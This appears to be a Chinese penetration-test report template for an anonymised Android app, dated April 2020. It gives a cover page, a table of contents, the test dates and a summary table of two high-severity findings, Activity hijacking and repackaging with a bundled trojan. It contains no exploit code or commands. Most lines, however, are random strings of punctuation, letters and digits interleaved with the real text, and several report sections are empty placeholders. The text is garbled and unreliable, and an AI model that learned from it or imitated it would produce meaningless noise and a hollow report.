" r* O; P$ u; A, @/ s1 Q
/ \9 e+ Y, [' N0 [ 4 B; V: |1 R# a( d
/ [0 C# z r' {0 J
" b1 B; h2 }- ?
. b3 I) a4 z' p$ ]* w0 E
$ t$ D' F4 Y/ n) H7 C7 u% G8 F. h8 n1 L; ?
4 E# Y/ i# }! X+ \# f1 t- ?1 c$ A& Z8 I, B; X- s
' d, m( u- G; n- C9 E5 O2 k
; `/ m/ ?* x8 y1 Q
文档编号:
' c9 |9 U6 c$ ] t1 K# J2 Z* u# z0 F4 O+ r! c# O) Q
9 v9 D8 F V' Y: P0 G+ }' I8 y5 p+ ^: h4 G$ u) I
: ~$ L7 B9 k3 K" k" p% V
3 T4 k- e. t5 F$ T8 k9 M
, M2 J, N* _+ I) C
# M6 o& _5 B0 O1 \* F( |3 P
! g m o1 Z' Q+ U+ ]& X& C
4 y) ~- ]/ P8 O# E8 ~5 r: l2 t ( N; ?9 u! Q' F" s$ G7 C4 e
3 A; {0 g7 j. k( y% l/ y
+ x: T, j. V1 j: W; N2 x
+ v% w; a& n+ q& l0 }
0 |1 X0 h/ q! n/ ^& n! o/ Q# k) ]) b1 J3 R* C, @
0 Y- d( k& j6 |# h
) \' t! e+ u/ V
D. g2 G% G- v s0 {5 p/ ^) j8 Q# Q$ d2 L. G- m$ T) D$ Y
$ s4 F5 {2 x, e1 g0 F( d: K: }
" g4 S" b6 K& I
8 S. \( c7 M; y" c2 w8 A4 g$ n. b9 ]
% s/ u1 u7 [! o" p/ o# \
7 _, A6 Y+ R! }3 r8 W
4 }: u7 A; a+ b" m; m8 Q3 b% l& S8 b; q- O6 o6 n
, |" J: @5 d# i: |) M6 W5 ~4 f" W
& c* d- P. j, T: ^/ [1 T7 I, t ; p3 B4 c. v' W9 `
2 ^( x; O; ]- b* W$ V. G4 G( F
: `* s m3 E, ^1 q, k, m8 s
1 m+ v; O. P' C
9 F% g6 P0 `4 N; L3 K# S: I$ u( [. M0 d+ [6 h1 [9 [0 m% s
某某某APP渗透测试 " a2 R: M! L! H) N3 H/ E2 |& t
3 g) e" k7 x6 p9 J$ i% B( K2 J
, w# k9 z& K' m
: p$ g, ^2 q! j7 E
! i2 ]7 A- W/ b1 I2 e5 p. t0 Z- s
1 b" }8 u* t o7 \- f $ d& A; U2 E6 K2 Q9 j8 V( Q
- X- j/ j* d1 U/ i: r, G
( P$ Q2 W/ E: N" m7 L x
) e0 b" x' X' p& }# n3 U* l 8 c! z7 T6 K- A' ]0 ^- t
' D& n: `: S" V6 o% D
0 `, V% \' [5 h% B- T$ ^, ]: Y
* r2 j! q; [9 p# k$ x- V0 b
9 _" z0 m5 x3 S) r6 G0 a' s# I- S2 W8 G
+ N7 @' h/ j* O/ T/ [" I- |) e7 ]+ s6 @ H1 o
e. n+ i5 J; m1 w
2 c S S, c5 h
! s# |9 ?# ?7 F# K0 H5 h5 L2 E: z X
; s$ O% g% ?. n5 N- [3 ^4 g
3 P: x1 m. E- M: |5 @
+ v0 M/ ?7 ~* J5 N+ S
, f l1 Q7 b6 s1 E
- y! }! d7 m' n# c
9 d& T5 q4 R# j5 B* q$ Z' i
4 q! X0 U: o: B0 \9 k& v7 `- J0 J: Z: J: G0 q3 a. W
技 术 报 告
: F/ t" ^6 b4 f7 ?+ J) z: D
7 u. [! D; y# Y- R
; s7 z6 j. B7 n) f: k: `( P- R% ~0 z2 B
" X- _4 \- g& S
* P4 y! z. @2 r1 i- |6 ]
* L4 I( M) N3 h) [
5 s1 x- c' Z! o2 f8 G
|0 s2 [, Q/ H- @
* _6 b$ \. z u4 d4 b% ` 4 i" _/ l% u& K' ~" y9 M
8 j* G+ R) V; `% u7 M
' N; x" s. o! ~8 K, H5 K E1 ^
4 y+ R' k1 |; g' A4 A
- A) c p, G7 X4 l, |9 [: v" [; F1 r
. \5 a, a6 p% y
. {& c0 z$ i" @( p
1 ?$ d+ R0 T0 p; N! e) c
# J6 R" Z& F( Q+ M1 o$ V6 h7 ^+ [
5 F6 H; ]' [* ~. r) s0 g) b# Y: F) p( P8 W
( U: B/ n0 e' E \. m1 R4 {( }/ X
! U# _- A; N: P+ D' W 8 ^/ O( A* i! V4 D! V
, q d' b( I- A
9 T# }& q( a0 L: k& Q9 l8 H$ C% |7 Q2 ]- q2 x4 y
3 b; H* O: L# w0 ^
. @" L8 @' z6 z2 H2 R0 V5 N6 ]
2 @, O; g) c! D& k' a
( D7 X( A% r8 |" O7 [7 ]/ I2 z
5 K% }. D) y+ \( G c- w* P! K
# P) U5 M+ W& \1 g
! N, |9 Y4 A9 Z! i s
0 p- j! |4 G0 N, _6 t; z; ^* F8 z
! `; Y" ~# M& Q Y4 t# N: S- R' o5 y' u1 J5 s- @0 ^4 j% b2 ^0 Z
1 `2 Z# `/ [$ m% K
~9 V4 x* o1 l: `' D7 F
7 M8 W5 c1 @- C8 L/ |
" _: j& \& v3 B1 a: |" P + R" ~: t" b2 y
$ I5 c t5 t0 v, |, o
, y# h* M9 g h" p( z
# W' m9 G+ ~- S0 s . B0 K; X; M& P9 d1 t2 |! u0 m
0 {% g& _2 K B7 A8 `9 t
, |. p$ `* f" P0 E( k7 V& }
# y" l; [8 e/ H' j
' l6 C, V4 r$ R1 o' o6 G8 u- Y7 i
3 ]9 ^6 g/ P; N( I' U9 H/ F5 T
. M* d# j0 E5 n: Z0 ~2 _7 b. L, k" B9 i' x9 F3 i0 j
! k( F) N+ ~! c4 v) N) |& _' M+ @7 x( F; K2 M% W( O+ c
2 Q$ x; I5 z* ?, }& [- u% f
9 a: v' f& {4 Q- v
: Z; \8 i4 c. Y* x4 h( F/ r" B0 u$ P) A- E7 K$ r
6 i) @- R* j, ^8 q o3 {
; w6 ]$ E8 _/ ?. Z: c& y' E, M
: B% ?! S9 p6 N5 _* T/ v/ H& E% S0 U: z* i) U
- _, E2 J/ V4 u4 Q5 ~: `7 ]) { I1 C9 N+ m
; w7 m/ w1 `, J% X- N2 v2 B
6 i" P' ^$ Q9 w, v, N5 u3 C
5 n/ s7 I3 O4 d- S: R
" B: k% c5 W+ J3 E$ {) y7 Z& W+ k/ U; i 4 H7 E# J; x! w
: O/ g( _5 r( B4 @( U* T6 r1 J0 g 3 |- |5 {1 ^3 b ~' E- C. B
& H I% i4 F! a* Q
$ x+ ^( L2 ]3 ]. u
: }* I$ B5 Q/ R
- u9 ~ t. M/ q5 G& c! y4 U& u9 ], C- [4 y
; \& J( g1 |+ b0 Y6 ^, A1 c: n5 @
+ l5 G& s* \& i* B& r
: Z j+ K- u) Y6 F; M. l& Y
& J5 o( A. l+ @; g) |
! Q) k I. `4 }7 j. _) G3 q5 C- r4 i4 O* T+ l
1 O4 C$ Q; C! t3 J$ b& C0 I- e3 v6 }. S
1 _( k u( x) @, b6 L
/ P8 A. ]4 G3 B" h8 ^
8 G. h- I2 H* @& E1 ?7 {2 E0 X& N
9 J S% E$ h( R
' K4 }7 z& _' d' N6 f# L! r% X( h5 B: |0 B( ]4 h0 ]# e3 L
4 l; v6 c2 a* _4 p/ _2 r1 w4 Z5 Q2 U1 `* J1 H* {" N
7 V: j4 o, O; |9 _' i, y& o: s( K& V f( U& {
2 a0 S0 {' b2 }; g
: K) m2 x/ c& [1 E
% ]# N- n3 K! v( I5 ]
* i" O, u# ^: o# w; w5 q 9 t1 U9 k* f; p. t0 n
: _8 p: ^! N( J
4 @( R. K9 y( u8 b% ?8 m6 ]* x1 ?+ e( r( b
1 U/ p2 ?2 E; g! j0 R* T/ t% g. g% p# P* ] s
, F Q7 F8 X/ M# A4 d+ I
% [2 p0 E) S2 Q4 w) Q
+ u- f/ ^6 [+ a4 u1 H
' H' Y& a6 I6 P2 I3 q
0 n/ D" g& {5 D0 O* a% D L
' J5 Y" |+ D* b. \! _
! P8 M* c+ S- B0 m G
% ]. j9 V0 [: m 二〇二〇年 ) z7 u# o6 I! A
2 S" u& L' n7 V1 p" ]# M
?/ y- D* Q1 J
' H' X' Q$ U, C( J + B' \; ~/ D' w$ R$ K6 T2 S/ R
, M6 i8 M4 Z$ Y5 ~. z$ Z
& o, m3 o; P) P1 _+ c4 G/ b8 W* J7 g) \; S4 g
0 Q/ k2 O& h0 w/ _. ]
8 o- U1 K- s, b" `0 F! k
5 E0 s' r- Z+ h- |3 }$ F" c& \" |; }, K. h: l
# ?5 C* l) V% r" p! ~2 R5 C
( o9 Z( p: T1 s# O
" j; d3 { l% D) D$ ^
d- L- F+ _! D9 N1 J5 J: E: r3 ]
& L3 u' U; I* @, ]
3 g4 J1 [! f: a) M 5 Y% k+ Q: {! f
7 [) h% {" K B; ]& j; s
. D' ~" R' E/ ~; d
* e1 v& f* k" ~% s. R' `1 V
目 录
. c' d4 T4 T `$ G% P$ {
; |/ e% r! {& j
5 S# b4 I1 E+ I: L4 C) Z
8 ~6 R+ c7 F; ^( u5 B
; t1 H" P$ x* h7 G% |6 u( b
& { `, U+ H* D7 i6 H ^6 X- S- m$ e& y( l0 }& [9 O
4 ^' e2 G. G/ e& G7 C# | $ }: v8 J7 E7 R- ~
6 r& B3 H. F$ b4 J- j/ W) v
' Z( ]) S7 X+ u6 E4 r/ Y! M. B/ M
; y; b/ A) a7 N" @) n; g6 O ' M" r- \+ q7 g: @
7 ?, c' x% e7 H$ v$ U
1 概述... 3 % Z3 A+ s( w( j) P3 f
7 h3 q ]+ ?- k" r$ y
( Q- {8 Y5 h% Q% B5 c- F. o5 _( k
" H6 Y2 Q( ]$ q* @7 s& n, N5 A5 X # l# s8 ~: W# a3 B& K
3 C: [, m9 p# r8 t. C7 @8 \# ] 1.2测试时间... 3 + v3 \8 [9 f5 g) b0 o# s H
, X$ {* o v1 S2 I$ v& i1 T, H: ?1 _" f
+ S- C, ^) z$ c+ p0 f0 C
$ V/ O% ` P7 z/ c6 q
5 }0 V: z& ?. M+ w; U( p' h
! Z) L2 ]; v% D; `/ Z- `/ o$ t6 S
1.3测试对象... 3 ) i; u4 A6 g8 ^( l+ V- Y4 ~" Y2 g
; b4 _3 {+ k; |6 A6 I3 B
1 I, D; x4 }. n+ d& _
. ~2 K; _; V9 l
4 B0 z0 v" }/ E0 k; Y
/ O, l6 ~* S5 F8 }! v% _ 1.4测试结果... 3 / k; }* G; U/ Q+ N
; M2 P# }* Q+ ~' L) G; U
* I, o1 k: I5 M% N
" F% ^; M8 x, x
- ~6 P# b, d- Y2 o8 ?* I) A3 D
# T0 V# q0 `" K s 2 检测结果... 4 - x! F, g5 t' O) C
- L, u9 [$ I5 g+ @5 o3 s% ]
! `- a6 p& I% N
+ I E- Z* X2 H) F9 L/ \* p. d
- @: ~/ i$ x9 {/ l P3 y
( \- o0 E" ^& E" f. e/ ], K 2.1 某某某... 4 * n1 K7 Q2 c/ ^3 e( ~4 }5 J) i& C- e
% v5 X- F+ {9 I* A
7 m' W& h+ c4 E- `% z
7 `2 F( p! x& R2 ?, w: i
) N' i; A& R8 S, h, P8 _
* o7 w7 I- t U; D; x1 I- @2 f 2.1.1检测目标... 4 . N* N) ^+ n; z3 f0 J4 Q6 M
0 S& k/ M( I# s% C: Z0 L
k% U) U q7 U6 m8 e2 D* f% [
: w7 A2 m5 G) q. G6 B* Z
0 K* G8 h# h: k
$ W) m2 v) ^# s" y
2.1.2检测结果... 4 ( }: @( a2 C0 ]% f, V5 I
, [3 c. k# |& `6 ]$ g
9 o9 ]; P8 s; Q: y, Y' Q9 ^3 }. a# f
" t! S3 K& q" k- c
( z* u. F$ Q! U1 _6 E4 u
2.1.2.1. 4 6 C7 t6 n" T4 s) \4 p/ I/ b( z
2 [# U) D; ~% [% H
+ {/ M. b0 e) Z$ c* o4 C( K6 }% E
/ a, v/ F1 F0 G! l6 O; s$ p
; Q3 J! E; o' s8 `" _& L# r
: R) ?# g5 p5 y) }- ] 2.1.2.2. 6
$ Q3 W) k" V' y' i2 l7 q: j4 D6 P9 r9 l/ M6 D/ o$ {
7 u- F8 K8 G% P' j9 A
3 Y4 S1 L0 u1 r" R: j# p' o" G6 M
/ m. T# c6 P( k8 e7 e4 Y$ c/ a( A3 ?7 w
/ W$ \) h. h7 S! {8 c
& u; ?% x+ L: L a" _
( q. Q, D- E# r3 Z6 B
( U# Y: i0 n! v: j/ [4 u, e) K
5 _" y; {0 ~' `7 ?
3 r2 N% j0 L! v3 H
' c, {) G/ ~2 u; O: E' k3 t! T) N
: e# Z) ^& ^( @3 n
$ J0 h& V3 O5 U# Z, x3 \ j9 q
+ y4 e6 @0 b5 u _5 _4 j
9 E u2 o3 i- L( }9 S
, f) q2 q/ h; g p& p% v % C8 F3 F0 n5 z
x5 e& {3 E0 K8 p0 Z
1 概述 & Q: n" z x5 E, U3 h7 D/ j
; D4 i6 T3 D7 o3 v' G! ~& ?8 x
* ^2 E6 O( t6 ]0 Q0 m3 W# F
0 O9 x$ b/ w4 Z5 V0 [, E+ k
9 C$ Q$ I; j8 m' k/ s
) n* |0 J/ z0 z. d7 S6 X 1.2测试时间 + c" }6 G# G. U( m* V( h' _8 v
4 t" G5 X- Y5 M/ N( B" w2 y
0 ?7 b; T1 X8 s, d5 `2 e0 v e+ ]3 |
5 t8 D9 K, t. ~+ Y' \6 |' W
* p ^/ l4 u% ]* O! ^
( g2 O" \7 h' K* ]. r' g. Q$ [+ t) ? u+ x; h% z5 i, J0 }
2 t7 \) f3 H/ _6 [4 I! V, w9 v$ d
" g/ [* C9 f7 @! M - ?" y& @; B% n) y8 u5 V6 D
b/ H$ m) M3 u
: `7 C( k6 F- C5 w1 o: z. M& P; O9 t1 I- j5 ]) V! a' y9 H
渗透测试时间
7 M9 o1 A9 Q b9 ~5 \" q4 a: g. F# y- M6 b
2 u8 K ] \0 F" r' L: G
" M/ o8 J% L+ {% a" c/ F5 I |
: E4 [1 U. S' Q# q4 B
# _# y' {7 G P! s! _
; p0 r$ a0 Y3 G& `
1 D" g( o5 y+ n6 ^+ q2 `$ H9 @ * P8 u, z0 V3 N' h+ v
8 O3 k7 x: N$ Y& H) G
8 Z) \3 L$ [+ g. `4 N* d
8 c6 c: E7 V' { b" |' t$ K & u; O# o& T6 m. {
5 N- H( e; R# f8 Y* x
起始时间 0 p( q# d- p% V, h
" B# p) }! I7 t& ~2 F
# a7 C$ p c* J3 B* c* s5 P
( y* G8 _ n- c" r. a
|
" p+ H$ m: D% v' g
& `+ Z# V ~/ _7 L" ~2 c# O ! Y& {( D K+ Y" @6 I
8 j$ T+ m, F/ G& l 3 {9 F. S, C/ Y& W9 J+ j$ u8 l
* W# x* J; |/ d1 p3 d5 t
2020年4月6日
5 ^0 { l/ Y3 M/ b) i6 u" \3 p# g8 l
# Y* Q2 E8 `- Q* w* A; k+ _# n, D
/ f( B2 K/ a3 Z% k" Q u
|
( q% m5 H( ~' Y9 l. t, e' C
0 i- d% l6 j# }& y P
8 J0 [+ v0 v. L/ f; J* d) B% E
# l) e; n$ L6 L6 e% y! C
, Y: f0 I; C6 F* Q! v+ @8 I; B+ f1 Y2 C$ ~7 K
: F' o5 v* r2 X! r) B
X! d* I* K' X1 j2 Q 8 l( T$ v# {$ g5 D; S* I4 e2 A* i
" t- V3 p8 k9 l+ B 结束时间
2 J* K) ?# {( {* z% ~% ~3 V* I- X7 W8 k
c/ ^. @, P _ X
5 d* }. S/ I' w5 P" v | O7 Z. |/ ?8 s) B3 f
, X3 e; b s5 U. E
2 c6 T) n: L% W
) }9 y1 r' A* t# ^ # @/ A+ s$ j4 v. C! W Y" J% ?* d
8 O8 w" X3 I% f$ v( e/ o1 l 2020年4月9日 ) ^8 {- |, m6 X0 ^9 ?! K
7 [# J; w5 F0 |) P# Y5 g
6 Q5 f6 }5 s0 X, S+ F0 k' s) _& S7 s4 U5 Z7 Z/ P# E7 C
| 2 w8 n% r( z5 h: k; x; h9 l; B
2 @/ k/ h. e3 _1 R' I
. p" w3 [& X5 Y$ F8 z9 m1 U T3 l6 M6 ?0 V! n9 ]- V5 K- u
2 {7 Z) i& R" Y9 G' ^0 B
; A# B0 [4 ]! a+ ?
# R: k& y: F# t, L- f3 W0 z9 V' z" V( T z7 \
6 C# c. K" o7 w4 n
7 `& D/ F: R4 W& t) o
1.3测试对象
% ^4 A3 V2 S# ]; g" |4 S; a5 Z
+ `/ |+ x( w, `1 @* ?% K/ V
9 I( d6 c2 R7 n9 j+ C
3 k% h4 j/ ]6 ?5 Q ! Y1 s% w# _9 {5 ^1 H+ b
( x- i; D4 Y) v1 U' f2 z& v
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: & B7 B( X; ?- k2 C1 n8 k( ?
( Q( P0 f7 s6 N7 E
8 Z+ ?+ m; T0 |5 _' Q& Q* Z! S2 n- T3 I9 h; c7 ?
3 L& T3 f3 O& ~/ P+ S$ I& m# {
1 }: b$ E/ w: z' `+ u( v 表1-1 检测对象 . x, n3 G) A+ `% q2 _* _( n) n1 N1 I. d
( M8 l7 p9 I$ N1 I! \3 m" ?& d3 {+ H
, P6 h3 j; P% D0 _) f0 M6 S
& P- u/ u* F+ x% ]+ B: c. J, x 1 L9 ?4 e7 z5 H% ?% h7 u4 p
; h2 A2 {- x: \5 |) q- o% ~
. X- c% B9 h+ W1 W f$ ]7 D( ^+ ~' a8 ?3 f9 J) h8 c
: d1 R2 L3 m- P" v6 J1 o/ q8 F
9 c% g! C1 e) {4 P% T
( ~" o# z" T" c& A) ]* u# \$ k
8 s0 K! n2 q9 w/ } / {4 }7 \# {3 m9 | L2 D# k" g3 Y
6 t+ o. C! e, g: ?
序号
! M7 g) m" @8 g# d6 y0 I5 w0 N
1 c" l( u/ j+ Z
; s N% i- f }' f& j+ o8 P
6 l0 U ?7 n, A |
; n- l- M! J" Z% O2 X N( c8 _, ]4 m' s' S* }
' d6 R, X9 C/ ]+ h& A
! G" C2 N! M E7 O
0 b5 T0 i6 u( \1 f- s! s1 h
+ n2 r, q, o' D5 e 测试对象 . F0 T! R7 A& u3 o- y
/ A0 K$ p! f& A8 ^6 P7 C3 j" S
# ~- U8 Y! F. e0 b) B/ y! `8 p- S9 p9 p
| " S/ u4 m. H2 E1 {
u5 t& h V3 e1 \8 q % S( Y7 Y$ E. y; g9 \- `
- `. k$ ^- C' ^1 u% w: u1 t3 X8 R
# I n0 q( _8 K! B! X' L8 u7 {
2 z* j) K& o& w8 W 测试地址 8 o0 k9 d1 h0 f+ E4 l* K, _* h" ]% i
' { w. @/ N# _
( r& v+ s5 }4 N1 e _
' X0 W0 L( X5 F | 8 c9 Y4 F! g1 S+ q- `
3 _7 `# ^( G+ j D% e+ z S& N
. I- P2 p& A+ S8 C3 o; Y; Q/ e# |* ^% ?, e; W7 J7 C! \+ ?5 A$ X" o$ I
+ T: `0 W: s/ ^9 K9 x
; C& c4 C( @2 T! `* R/ {. U/ Z 安全漏洞 ; l0 p# q; `% w+ s1 j
, o0 e1 X' j P" _4 f# v
) g; l$ ~/ R. q& m# ~' j' w0 p. C! G I
/ @- q; Z' a: z( Y
| - E! @3 g3 W: ~! i6 G8 [
* [: a( n# |* [2 K5 k
& M" t' A6 d. l9 { I/ K0 |
3 \6 y. [) z, g8 y
$ P- [6 t5 G! S! M# m$ P
X0 `! s5 M3 J V
' ^1 K5 G% Q9 L: j- R: H
6 k3 v" v: U8 I9 u9 S 3 u6 U4 ]& X0 Z* J4 ~5 Z
8 v" T- Q, h. \5 c$ I 1 9 T# y) r7 F/ j: {) n
( I; d0 I! a: U) C% M" t$ F; v * J# e) m- \6 y* B: B
8 K' B4 Y7 ]( Z. X) F
| + `1 W% r7 m5 K% B, v$ W: f
- x7 P% ?- J* K# _1 m
1 |& v4 L! Y' d4 r+ i+ Y, @9 R% |9 y* z
- M/ a7 }0 R V7 R& p6 E/ [3 a: N- d4 C7 T8 L
某某某安卓APP ! y1 _/ [- q' B ~3 a8 t
" |3 d: c+ e* M3 ~+ P' m
) Y5 y7 C% U+ O& J9 \' e
0 H C) b, \, U; |4 }* R |
2 u) U" |. k0 K- M1 t9 S6 H$ V3 o8 k+ F6 w2 `: U4 l1 J
8 c0 Q. W: @( g
3 R% S0 d( J$ b) P5 w/ J
1 w0 S; P6 g1 A: E4 w8 {! F4 E9 C
% n q2 e7 L, z# I
A# d5 m0 T- ^" ^! X: R$ Z3 f4 f3 h# n- o+ O4 n3 x- E. m
! B& d8 L8 S0 }3 q- J8 I" ?/ K( c6 [7 \, m/ q, S+ t! w; r1 h
| ' q; D" d0 f8 a. M2 D$ o
: o. _# t4 M1 U% [2 Y1 f
8 q, ?7 c% A$ E7 x3 l2 p
; g. l8 x. J# v/ h, i* [% p$ t2 z $ w0 v4 w& M- J" D) G4 i
0 d! N+ K7 `1 O! K. \6 ]# ?
2 " \, t9 H7 m/ s# r
3 a* l, `/ B0 F* v# c
Y( Z! ~: D5 {4 w$ Y2 z- Y# w1 h; f7 k+ Y, S
| 1 u; B6 u- F' y+ M' N7 X( B; ^" J
) B1 X- M* q* t' I8 A
2 \# C- f! n9 ]7 b- j% z- s0 ~
( }* w: t. v) a5 o% q
c! _. X( |8 b' [5 E! t
. }1 z) c9 S" R
: f" s' |4 d- ]9 V4 _9 l; H# n7 H Y! K- G
% f; \/ N# ]5 c- p& d, J
4 \3 @5 v" I: A Y 1.4测试结果 s) e: ]9 {8 i2 t8 D
6 n" v3 Y* E4 q5 v9 _' ^
/ i- u0 R W. X8 z" P/ d2 E- M5 o6 R' L8 n; o
* K0 ]! W# O: s5 |$ X* O
1 f, T- P/ N3 \( s" o( X 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
) s0 Z i' a8 K5 u1 `7 \
; s0 w) H9 O2 J0 {& f
9 P+ p7 [0 g( z
5 s$ U, K0 M- t% U; D: K , M9 X+ `% Z1 G8 |
1 J( R+ j( x# j8 B
# H# M/ y8 E; W$ L1 K- x I: v7 M% i. `3 R
! w; y0 Z3 J& _8 ]; ], Y7 ^
$ k9 e" ~+ E/ o# E0 }3 b6 h% M1 R) { 5 W' e4 I4 |, N2 K
T; w/ z! b0 g! Z
4 P6 U2 x9 H( {/ O# }; ^3 P: W! C' R% i& _: H
% I1 B2 r& ~% s3 M* f$ T) e5 U7 _* J5 }6 B/ U8 O8 h* j
( n1 B; N+ G: B/ b4 _9 l1 q
9 l: b4 b$ V" }! X
1 N0 d% C5 |/ e# _, f3 _; }
4 J) h$ a/ Y! V! E9 l 2 h0 y0 z2 y _7 G- S& e0 r
; l6 C6 c! U+ K. o' i; t. X 序号
Y1 H* w! L! ]
$ i' p! E; |: \3 D7 @
3 e2 g, d$ R5 x( t
5 w% Q8 J# J( M4 f5 `% { |
4 z9 c7 ]. j) N+ j! p9 w: @2 n5 N3 Z
6 t8 F; ?# s' A4 U/ v& C) G ' b5 ?% m( z0 m. Y$ `, A
$ Q9 P( G/ p( k2 _
& I+ D* w `% j. v! }7 I' l
6 j! O6 w5 l. u7 V+ \8 i2 N. X
系统名称 # }/ ]* W3 o9 Q* y1 u
W* w- C' y- X( F# R, k7 X
0 d/ e g, F0 k7 q
( p+ ~ h) S- g3 e2 f' I | 5 R) Q" r- R- Q$ ^! @
& N/ u( ]3 [. s& m2 [0 `# E" {9 k. C
( v- Z( O9 T2 G$ n, w) c/ F( b7 ~% ~5 |& N
2 K4 M! k$ z# ^
1 v2 j0 [ \' s4 M. [ 漏洞名称
+ d5 ?7 g+ y6 N+ a0 G! A5 ?
: |7 f+ U% {3 Z2 O
- E, O/ i* D \
1 R, ?$ |$ d1 I |
# Z9 E5 B$ R/ t2 }* _6 K9 U2 X
8 [: E9 g# w- X5 I + ]' S8 o2 w( ]( a1 c4 ]
% H% I- `+ C9 H& I , p% P$ e$ V6 ~) D" N) K
% b s- S6 d! e0 M/ j3 o" a* N8 F 漏洞危害
" V/ \) s- R, E: E$ {2 ^' ^
' y# q. E& @- @) i ' e4 F! F+ f& H& s+ b# ?
$ N0 O" |: H+ _ P" U* m
| ! t0 o& `* S3 S
* b' \, A2 i' O5 ~ 5 C2 p. E3 @9 C: P$ F/ r
I, q8 u2 q$ x3 d/ l & d i$ `& B1 _2 ~$ r* I' ~. z
4 i, n+ u+ M% z/ g+ Y 修复结果
# M9 [1 n L* k' |
! N3 E# \ B4 m3 J 4 }( [2 `" O: r8 l
' q/ W! K( W7 E6 ?4 G0 w
| . }7 z: @: t% K$ b& x& r
" L! [2 P; f" ?3 D, b
5 `. ]) a& s/ `, b" F6 |3 U
: Q& {4 @/ y4 i; @2 M7 ~) o( ?
# M' E: t7 U5 }. G
% A( E9 ^% E* `- D; ] ; }* P& t0 r: _7 O
3 g, x" m' Q) I+ W& A
( S+ i4 I' i Q
- @5 x) {1 k M9 U4 J5 z 1 - d3 k; { E8 R" h8 q
! p, @2 F6 Q1 `, d2 z
1 ?0 ?! X3 H! p$ }- X
2 q: p- S, c. F2 U2 Z
|
`9 f0 P: f$ y# U* ^2 x+ w& L. a$ {0 G
" o5 l3 H% E- G, A; V9 g; U* D4 i* V6 o( R) V' A& g
) m3 O0 l3 ?$ k/ J; i5 P6 _; O8 V; |+ J
某某某某某某APP
4 j8 e: \: c$ b4 l
' {% j3 K5 ?+ \, q7 y2 `5 h " V1 ^8 S0 t+ p( G; w
' V# L7 e# |! _. M6 n+ f |
9 B1 b0 I% f H/ g) z# C( D# L& N8 S" v" i: J
! U5 [& a, v! l) b0 B u9 ]" @0 k
( @$ T: t) n4 ~* I/ M$ t6 G
$ l$ m% Q' B% W& v) `
, H) a' L* v+ \8 C' Q" p, J Activity 劫持 6 q- L+ m T4 M- j
7 M# x: q; g$ E+ c& k9 U) G
7 a/ s4 [6 d2 @; ^& {: [1 y( e" b3 x; j: N1 r n+ w
1 Z- u) O3 u' ^) d% ?
7 F8 i; g% o/ w3 r% a
' b" Q, R; V6 s b. K9 G3 {# c% n1 b# W$ i. X v. G
, R; D8 I( y4 l6 u2 {1 E2 T, @
4 C O. P9 I1 R4 ~; Q |
) x' L0 e3 a b5 T! m! ^9 v4 w4 q% L# v) R# r" n
$ n' Z" Q9 M) @- }/ D8 ^- v+ Y: {9 p1 ]2 q1 W' f* r: T J
; z3 z. g. ^/ [5 R' y7 c% o/ m* V4 |
% V V6 T" l9 E+ n 高 5 V e% r: B) f( ~# U
4 D. x1 M4 Z2 _. ~, S- c
% ]) k5 h- R- c5 Q" z: R
& d4 t) t3 X6 L5 G. d
|
7 V' C$ n- G9 k1 v @8 u( `$ g( {! w
+ P. `+ {3 a. N7 Y$ }2 M# |5 C2 H: }
' B8 t) X. g6 W" @) k% F ) _* q0 S, _7 j6 W/ x( k' d
/ P5 s9 W8 Y( h) ?
5 |/ M3 \2 J# r; B
( L, z$ f; u; s0 Z , H# A: Z9 D" u2 w9 Y
, b& A9 D0 o5 e0 U, c- m# P/ a |
* s! c8 b' p7 J( \* n% S: y2 P4 j3 ^5 O$ w d( \
+ x& G7 Q" [, K/ L* O. B6 D5 t8 b- a$ Y1 h+ b) M
7 P$ Q+ E& U6 Q& j7 p+ _. H
" o) s' x7 {$ v! G# v
' s2 L. Y2 p- A& _ L
% Y5 r5 t6 W2 d; u
2 y9 F7 e3 |7 G6 c7 t3 U. K3 \8 Q) c2 f
2
; \# p. I3 Q/ }( Y( B4 X6 c+ m5 `9 Y! h4 ^+ Y. ?- }
/ u/ s& C" g( _( G# b6 `9 W% o% C
1 y/ q: ?, N1 l* v+ r& W
| : _6 g0 n- d- b
n* C k3 g2 c1 o+ H
8 E' v3 X. H. e& A7 w- U8 c$ a% j9 z/ n E/ `7 V" T3 b& u2 E
8 g4 B+ }5 ?1 x) C7 z" j3 A6 p! e4 L9 l
某某某某某某APP
2 [2 ^! j, c2 x/ f8 r2 ^6 f
. X, a5 e& |1 K
9 A- u1 G+ w; H1 m) Z! ^$ |9 [- E6 O( J+ Q% n ?
| , |% Y+ @. X2 \% ]
" V) r8 K9 \( r0 T& ?# R) W + x/ l/ k: {& a7 |" l
, b$ t. n7 f) k o4 K: f
4 p& A+ ~ b. H$ f P
6 {2 B% n) d# w6 V0 X 反编译二次打包捆绑木马、篡改APP代码 " Y. \1 U; Y4 b8 A$ h% y( J
9 b" D5 s' N) z
6 d8 D0 l7 |+ |3 o" F# D# o" }% X# w$ p0 g( d
| # j" q! e% ]$ k9 ~6 d7 _
6 z6 u2 r6 R* `8 t+ q* d r
% C7 [2 D! }3 K; R$ K$ }
; I7 O5 k; G+ [7 b$ F* [8 i& R! E
* M) J6 e C, l. \& \ H
8 h2 L- J) Z! i; G 高 + ?$ Z$ E5 v0 q2 \! M
1 A. h( y/ G1 ~2 `9 Y! T
7 [+ l/ d+ w: S) O" j) ?) x2 L1 d" M1 i7 m; J# s# O
|
7 t% p5 M5 i2 L7 c8 K: _1 K1 B; G- I
- W: _ ~9 X8 O' V& \, K( J! H- V0 d7 \! o% g9 Z
( q* Q* H `* S" m7 @" T. P% {
1 [! x6 W! o# J/ e+ s
2 h& w7 P" @) i* z, `) o
- H ^7 N" I: I1 I+ o+ c- ]' y
+ L2 u8 v- G: T+ L
% o* t! J% z1 g' L, F* } |
( T! r$ ]8 E: ]+ [ m3 A- U& ^* F4 n1 N3 n5 Z
0 a0 _$ L8 x- k1 P5 d, \ N* ~2 a- J" z! ]( M
; g; A1 Q6 g. Q1 p* b; E' q0 z5 r
" S9 ~! e% y% W$ Z' h" v' a
. w% c3 v4 H+ R* r
- n9 J( G) ]: j% A; B* O
. e1 V& T* N8 x1 A- R( V' {& U# j+ C
$ o5 q7 Y9 k5 c2 T. j4 G
. x$ ?( g" Q6 ^5 R" S4 ?
2 L4 w7 d- q2 j) c- b/ j9 _" P* W( n1 ^# E
- q7 X, t7 j; Z4 N
v. K- t; o4 g
7 c. D8 `0 g& q. Y% e4 d( F3 l0 t$ J2 y0 N5 R7 N& t& D
